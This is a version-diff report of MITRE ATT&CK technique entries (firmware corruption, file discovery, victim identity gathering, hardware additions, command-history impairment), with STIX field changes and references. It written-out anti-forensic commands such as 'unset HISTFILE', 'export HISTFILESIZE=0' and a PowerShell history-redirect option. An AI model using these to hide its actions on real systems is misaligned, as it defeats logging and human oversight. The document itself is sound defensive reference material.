external_references[1]['description']Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.
external_references[1]['url']https://technet.microsoft.com/en-us/library/security/ms14-068.aspxhttps://adsecurity.org/?p=1515
external_references[2]['source_name']ADSecurity Detecting Forged TicketsTechnet MS14-068
external_references[2]['description']Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
external_references[2]['url']https://adsecurity.org/?p=1515https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
x_mitre_version1.11.4

[T1211] Exploitation for Defense Evasion

Current version: 1.3

Version changed from: 1.1 → 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Application Log: Application Log Content', 'Process: Process Creation']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 20:00:46.900000+00:002022-04-28 16:10:16.632000+00:00
x_mitre_version1.11.3

[T1083] File and Directory Discovery

Current version: 1.5

Version changed from: 1.3 → 1.5


Old Description
New Description
t1Adversaries may enumerate files and directories or may searct1Adversaries may enumerate files and directories or may searc
>h in specific locations of a host or network share for certa>h in specific locations of a host or network share for certa
>in information within a file system. Adversaries may use the>in information within a file system. Adversaries may use the
> information from [File and Directory Discovery](https://att> information from [File and Directory Discovery](https://att
>ack.mitre.org/techniques/T1083) during automated discovery t>ack.mitre.org/techniques/T1083) during automated discovery t
>o shape follow-on behaviors, including whether or not the ad>o shape follow-on behaviors, including whether or not the ad
>versary fully infects the target and/or attempts specific ac>versary fully infects the target and/or attempts specific ac
>tions.  Many command shell utilities can be used to obtain t>tions.  Many command shell utilities can be used to obtain t
>his information. Examples include <code>dir</code>, <code>tr>his information. Examples include <code>dir</code>, <code>tr
>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc>ee</code>, <code>ls</code>, <code>find</code>, and <code>loc
>ate</code>.(Citation: Windows Commands JPCERT) Custom tools >ate</code>.(Citation: Windows Commands JPCERT) Custom tools 
>may also be used to gather file and directory information an>may also be used to gather file and directory information an
>d interact with the [Native API](https://attack.mitre.org/te>d interact with the [Native API](https://attack.mitre.org/te
>chniques/T1106).>chniques/T1106). Adversaries may also leverage a [Network De
 >vice CLI](https://attack.mitre.org/techniques/T1059/008) on 
 >network devices to gather file and directory information (e.
 >g. <code>dir</code>, <code>show flash</code>, and/or <code>n
 >vram</code>).(Citation: US-CERT-TA18-106A)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesTomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.
external_referencesUS-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
external_referencesCAPEC-127
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
external_referencesCAPEC-127
external_referencesCAPEC-497
external_referencesTomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.
values_changed
STIX FieldOld valueNew Value
modified2021-08-23 20:44:32.048000+00:002022-09-06 21:55:41.262000+00:00
descriptionAdversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)
external_references[1]['source_name']capecWindows Commands JPCERT
external_references[1]['url']https://capec.mitre.org/data/definitions/127.htmlhttps://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
external_references[2]['source_name']capecUS-CERT-TA18-106A
external_references[2]['url']https://capec.mitre.org/data/definitions/497.htmlhttps://www.us-cert.gov/ncas/alerts/TA18-106A
external_references[3]['source_name']Windows Commands JPCERTcapec
external_references[3]['url']https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.htmlhttps://capec.mitre.org/data/definitions/127.html
x_mitre_detectionSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.
x_mitre_version1.31.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/497.html', 'external_id': 'CAPEC-497'}
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1495] Firmware Corruption

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may overwrite or corrupt the flash memory content1Adversaries may overwrite or corrupt the flash memory conten
>ts of system BIOS or other firmware in devices attached to a>ts of system BIOS or other firmware in devices attached to a
> system in order to render them inoperable or unable to boot> system in order to render them inoperable or unable to boot
>.(Citation: Symantec Chernobyl W95.CIH) Firmware is software>, thus denying the availability to use the devices and/or th
> that is loaded and executed from non-volatile memory on har>e system.(Citation: Symantec Chernobyl W95.CIH) Firmware is 
>dware devices in order to initialize and manage device funct>software that is loaded and executed from non-volatile memor
>ionality. These devices could include the motherboard, hard >y on hardware devices in order to initialize and manage devi
>drive, or video cards.>ce functionality. These devices may include the motherboard,
 > hard drive, or video cards.  In general, adversaries may ma
 >nipulate, overwrite, or corrupt firmware in order to deny th
 >e use of the system or devices. For example, corruption of f
 >irmware responsible for loading the operating system for net
 >work devices may render the network devices inoperable.(Cita
 >tion: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs
 >_ukraine) Depending on the device, this attack may also resu
 >lt in [Data Destruction](https://attack.mitre.org/techniques
 >/T1485). 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:31:46.550000+00:002022-08-31 17:30:05.440000+00:00
descriptionAdversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485).
external_references[1]['source_name']Symantec Chernobyl W95.CIHcisa_malware_orgs_ukraine
external_references[1]['description']Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.
external_references[1]['url']https://www.symantec.com/security-center/writeup/2000-122010-2655-99https://www.cisa.gov/uscert/ncas/alerts/aa22-057a
external_references[2]['source_name']MITRE Trustworthy Firmware Measurementdhs_threat_to_net_devices
external_references[2]['description']Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.
external_references[2]['url']http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-researchhttps://cyber.dhs.gov/assets/report/ar-16-20173.pdf
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'MITRE Trustworthy Firmware Measurement', 'description': 'Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.', 'url': 'http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research'}
external_references{'source_name': 'Symantec Chernobyl W95.CIH', 'description': 'Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.', 'url': 'https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99'}
x_mitre_platformsNetwork

[T1589] Gather Victim Identity Information

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may gather information about the victim's identit1Adversaries may gather information about the victim's identi
>ty that can be used during targeting. Information about iden>ty that can be used during targeting. Information about iden
>tities may include a variety of details, including personal >tities may include a variety of details, including personal 
>data (ex: employee names, email addresses, etc.) as well as >data (ex: employee names, email addresses, etc.) as well as 
>sensitive details such as credentials.  Adversaries may gath>sensitive details such as credentials.  Adversaries may gath
>er this information in various ways, such as direct elicitat>er this information in various ways, such as direct elicitat
>ion via [Phishing for Information](https://attack.mitre.org/>ion via [Phishing for Information](https://attack.mitre.org/
>techniques/T1598). Information about victims may also be exp>techniques/T1598). Information about users could also be enu
>osed to adversaries via online or other accessible data sets>merated via other active means (i.e. [Active Scanning](https
> (ex: [Social Media](https://attack.mitre.org/techniques/T15>://attack.mitre.org/techniques/T1595)) such as probing and a
>93/001) or [Search Victim-Owned Websites](https://attack.mit>nalyzing responses from authentication services that may rev
>re.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Reg>eal valid usernames in a system.(Citation: GrimBlog Username
>ister Deloitte)(Citation: Register Uber)(Citation: Detectify>Enum) Information about victims may also be exposed to adver
> Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitH>saries via online or other accessible data sets (ex: [Social
>ub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks> Media](https://attack.mitre.org/techniques/T1593/001) or [S
>) Gathering this information may reveal opportunities for ot>earch Victim-Owned Websites](https://attack.mitre.org/techni
>her forms of reconnaissance (ex: [Search Open Websites/Domai>ques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitt
>ns](https://attack.mitre.org/techniques/T1593) or [Phishing >e)(Citation: Register Uber)(Citation: Detectify Slack Tokens
>for Information](https://attack.mitre.org/techniques/T1598))>)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog
>, establishing operational resources (ex: [Compromise Accoun>)(Citation: GitHub Gitrob)(Citation: CNET Leaks)  Gathering 
>ts](https://attack.mitre.org/techniques/T1586)), and/or init>this information may reveal opportunities for other forms of
>ial access (ex: [Phishing](https://attack.mitre.org/techniqu> reconnaissance (ex: [Search Open Websites/Domains](https://
>es/T1566) or [Valid Accounts](https://attack.mitre.org/techn>attack.mitre.org/techniques/T1593) or [Phishing for Informat
>iques/T1078)).>ion](https://attack.mitre.org/techniques/T1598)), establishi
 >ng operational resources (ex: [Compromise Accounts](https://
 >attack.mitre.org/techniques/T1586)), and/or initial access (
 >ex: [Phishing](https://attack.mitre.org/techniques/T1566) or
 > [Valid Accounts](https://attack.mitre.org/techniques/T1078)
 >).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)']
x_mitre_data_sources['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Content']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:27:49.579000+00:002022-04-21 14:39:39.857000+00:00
descriptionAdversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
external_references[2]['source_name']Register DeloitteDetectify Slack Tokens
external_references[2]['description']Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.
external_references[2]['url']https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
external_references[3]['source_name']Register UberGitHub truffleHog
external_references[3]['description']McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.
external_references[3]['url']https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/https://github.com/dxa4481/truffleHog
external_references[4]['source_name']Detectify Slack TokensGrimBlog UsernameEnum
external_references[4]['description']Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.
external_references[4]['url']https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
external_references[5]['source_name']Forbes GitHub CredsRegister Uber
external_references[5]['description']Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.
external_references[5]['url']https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
external_references[6]['source_name']GitHub truffleHogGitHub Gitrob
external_references[6]['description']Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.
external_references[6]['url']https://github.com/dxa4481/truffleHoghttps://github.com/michenriksen/gitrob
external_references[7]['source_name']GitHub GitrobCNET Leaks
external_references[7]['description']Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.
external_references[7]['url']https://github.com/michenriksen/gitrobhttps://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
external_references[8]['source_name']CNET LeaksForbes GitHub Creds
external_references[8]['description']Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.
external_references[8]['url']https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Register Deloitte', 'description': "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", 'url': 'https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/'}

[T1200] Hardware Additions

Current version: 1.6

Version changed from: 1.2 → 1.6


Old Description
New Description
t1Adversaries may introduce computer accessories, computers, ot1Adversaries may introduce computer accessories, networking h
>r networking hardware into a system or network that can be u>ardware, or other computing devices into a system or network
>sed as a vector to gain access. While public references of u> that can be used as a vector to gain access. Rather than ju
>sage by threat actors are scarce, many red teams/penetration>st connecting and distributing payloads via removable storag
> testers leverage hardware additions for initial access. Com>e (i.e. [Replication Through Removable Media](https://attack
>mercial and open source products can be leveraged with capab>.mitre.org/techniques/T1091)), more robust hardware addition
>ilities such as passive network tapping (Citation: Ossmann S>s can be used to introduce new functionalities and/or featur
>tar Feb 2011), network traffic modification (i.e. [Adversary>es into a system that can then be abused.  While public refe
>-in-the-Middle](https://attack.mitre.org/techniques/T1557)) >rences of usage by threat actors are scarce, many red teams/
>(Citation: Aleks Weapons Nov 2015), keystroke injection (Cit>penetration testers leverage hardware additions for initial 
>ation: Hak5 RubberDuck Dec 2016), kernel memory reading via >access. Commercial and open source products can be leveraged
>DMA (Citation: Frisk DMA August 2016), addition of new wirel> with capabilities such as passive network tapping, network 
>ess access to an existing network (Citation: McMillan Pwn Ma>traffic modification (i.e. [Adversary-in-the-Middle](https:/
>rch 2012), and others.>/attack.mitre.org/techniques/T1557)), keystroke injection, k
 >ernel memory reading via DMA, addition of new wireless acces
 >s to an existing network, and others.(Citation: Ossmann Star
 > Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk
 > DMA August 2016)(Citation: McMillan Pwn March 2012)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Application Log: Application Log Content', 'Drive: Drive Creation', 'Network Traffic: Network Traffic Flow']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesMichael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.
external_referencesCAPEC-440
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-440
external_referencesUlf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-08-17 00:28:00.947000+00:002022-04-28 16:09:12.782000+00:00
descriptionAdversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)
external_references[1]['source_name']capecOssmann Star Feb 2011
external_references[1]['url']https://capec.mitre.org/data/definitions/440.htmlhttps://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html
external_references[2]['source_name']Ossmann Star Feb 2011Aleks Weapons Nov 2015
external_references[2]['description']Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.
external_references[2]['url']https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.htmlhttps://www.youtube.com/watch?v=lDvf4ScWbcQ
external_references[3]['source_name']Aleks Weapons Nov 2015McMillan Pwn March 2012
external_references[3]['description']Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.
external_references[3]['url']https://www.youtube.com/watch?v=lDvf4ScWbcQhttps://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/
external_references[4]['source_name']Hak5 RubberDuck Dec 2016Frisk DMA August 2016
external_references[4]['description']Hak5. (2016, December 7). Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained. Retrieved March 30, 2018.Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.
external_references[4]['url']https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explainedhttps://www.youtube.com/watch?v=fXthwl6ShOg
external_references[5]['source_name']Frisk DMA August 2016capec
external_references[5]['url']https://www.youtube.com/watch?v=fXthwl6ShOghttps://capec.mitre.org/data/definitions/440.html
x_mitre_version1.21.6
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'McMillan Pwn March 2012', 'description': 'Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.', 'url': 'https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/'}

[T1562.003] Impair Defenses: Impair Command History Logging

Current version: 2.2

Version changed from: 2.0 → 2.2


Old Description
New Description
t1Adversaries may impair command history logging to hide commat1Adversaries may impair command history logging to hide comma
>nds they run on a compromised system. Various command interp>nds they run on a compromised system. Various command interp
>reters keep track of the commands users type in their termin>reters keep track of the commands users type in their termin
>al so that users can retrace what they've done.   On Linux a>al so that users can retrace what they've done.   On Linux a
>nd macOS, command history is tracked in a file pointed to by>nd macOS, command history is tracked in a file pointed to by
> the environment variable <code>HISTFILE</code>. When a user> the environment variable <code>HISTFILE</code>. When a user
> logs off a system, this information is flushed to a file in> logs off a system, this information is flushed to a file in
> the user's home directory called <code>~/.bash_history</cod> the user's home directory called <code>~/.bash_history</cod
>e>. The <code>HISTCONTROL</code> environment variable keeps >e>. The <code>HISTCONTROL</code> environment variable keeps 
>track of what should be saved by the <code>history</code> co>track of what should be saved by the <code>history</code> co
>mmand and eventually into the <code>~/.bash_history</code> f>mmand and eventually into the <code>~/.bash_history</code> f
>ile when a user logs out. <code>HISTCONTROL</code> does not >ile when a user logs out. <code>HISTCONTROL</code> does not 
>exist by default on macOS, but can be set by the user and wi>exist by default on macOS, but can be set by the user and wi
>ll be respected.  Adversaries may clear the history environm>ll be respected.  Adversaries may clear the history environm
>ent variable (<code>unset HISTFILE</code>) or set the comman>ent variable (<code>unset HISTFILE</code>) or set the comman
>d history size to zero (<code>export HISTFILESIZE=0</code>) >d history size to zero (<code>export HISTFILESIZE=0</code>) 
>to prevent logging of commands. Additionally, <code>HISTCONT>to prevent logging of commands. Additionally, <code>HISTCONT
>ROL</code> can be configured to ignore commands that start w>ROL</code> can be configured to ignore commands that start w
>ith a space by simply setting it to "ignorespace". <code>HIS>ith a space by simply setting it to "ignorespace". <code>HIS
>TCONTROL</code> can also be set to ignore duplicate commands>TCONTROL</code> can also be set to ignore duplicate commands
> by setting it to "ignoredups". In some Linux systems, this > by setting it to "ignoredups". In some Linux systems, this 
>is set by default to "ignoreboth" which covers both of the p>is set by default to "ignoreboth" which covers both of the p
>revious examples. This means that “ ls” will not be saved, b>revious examples. This means that “ ls” will not be saved, b
>ut “ls” would be saved by history. Adversaries can abuse thi>ut “ls” would be saved by history. Adversaries can abuse thi
>s to operate without leaving traces by simply prepending a s>s to operate without leaving traces by simply prepending a s
>pace to all of their terminal commands.  On Windows systems,>pace to all of their terminal commands.   On Windows systems
> the <code>PSReadLine</code> module tracks commands used in >, the <code>PSReadLine</code> module tracks commands used in
>all PowerShell sessions and writes them to a file (<code>$en> all PowerShell sessions and writes them to a file (<code>$e
>v:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHos>nv:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHo
>t_history.txt</code> by default). Adversaries may change whe>st_history.txt</code> by default). Adversaries may change wh
>re these logs are saved using <code>Set-PSReadLineOption -Hi>ere these logs are saved using <code>Set-PSReadLineOption -H
>storySavePath {File Path}</code>. This will cause <code>Cons>istorySavePath {File Path}</code>. This will cause <code>Con
>oleHost_history.txt</code> to stop receiving logs. Additiona>soleHost_history.txt</code> to stop receiving logs. Addition
>lly, it is possible to turn off logging to this file using t>ally, it is possible to turn off logging to this file using 
